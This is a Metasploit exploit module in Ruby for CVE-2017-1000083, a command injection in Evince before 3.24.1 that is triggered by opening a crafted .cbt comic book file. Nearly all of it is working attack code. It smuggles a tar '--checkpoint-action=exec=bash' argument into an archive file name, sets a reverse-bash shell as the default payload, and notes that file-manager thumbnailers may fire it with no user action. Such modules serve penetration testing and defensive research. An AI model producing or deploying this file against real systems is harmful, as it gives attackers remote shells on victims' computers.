Evince CBT File Command Injection

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'rex/zip'  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::FILEFORMAT  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Evince CBT File Command Injection',  
'Description' => %q{  
This module exploits a command injection vulnerability in Evince  
before version 3.24.1 when opening comic book `.cbt` files.  
  
Some file manager software, such as Nautilus and Atril, may allow  
automatic exploitation without user interaction due to thumbnailer  
preview functionality.  
  
Note that limited space is available for the payload (<256 bytes).  
Reverse Bash and Reverse Netcat payloads should be sufficiently small.  
  
This module has been tested successfully on evince versions:  
  
3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;  
3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Felix Wilhelm', # Discovery  
'Sebastian Krahmer', # PoC  
'Matlink', # Exploit  
'bcoles' # Metasploit  
],  
'References' =>  
[  
['BID', '99597'],  
['CVE', '2017-1000083'],  
['EDB', '45824'],  
['URL', 'https://seclists.org/oss-sec/2017/q3/128'],  
['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],  
['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],  
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],  
['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],  
['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],  
['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']  
],  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 215,  
'BadChars' => "\x00\x0a\x0d\x22",  
'DisableNops' => true  
},  
'DefaultOptions' =>  
{  
'PAYLOAD' => 'cmd/unix/reverse_bash',  
'DisablePayloadHandler' => true  
},  
'Targets' => [[ 'Automatic', {}]],  
'Privileged' => false,  
'DisclosureDate' => '2017-07-13',  
'DefaultTarget' => 0))  
register_options([  
OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])  
])  
end  
  
def exploit  
ext = %w[png jpg gif]  
path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"  
  
# Tar archive max path length is 256.  
if path.length > 256  
fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"  
end  
  
# Tar archive max file name length is 100.  
path.split('/').each do |fname|  
if fname.length > 100  
fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"  
end  
end  
  
# Create malicious tar archive  
tarfile = StringIO.new  
Rex::Tar::Writer.new tarfile do |tar|  
tar.add_file path, 0644 do |io|  
io.write ''  
end  
# Pad file to 1+ MB to trigger tar checkpoint action  
tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|  
io.write rand_text(1_000_000..1_100_000)  
end  
end  
tarfile.rewind  
cbt = tarfile.read  
  
print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."  
file_create cbt  
end  
end  
`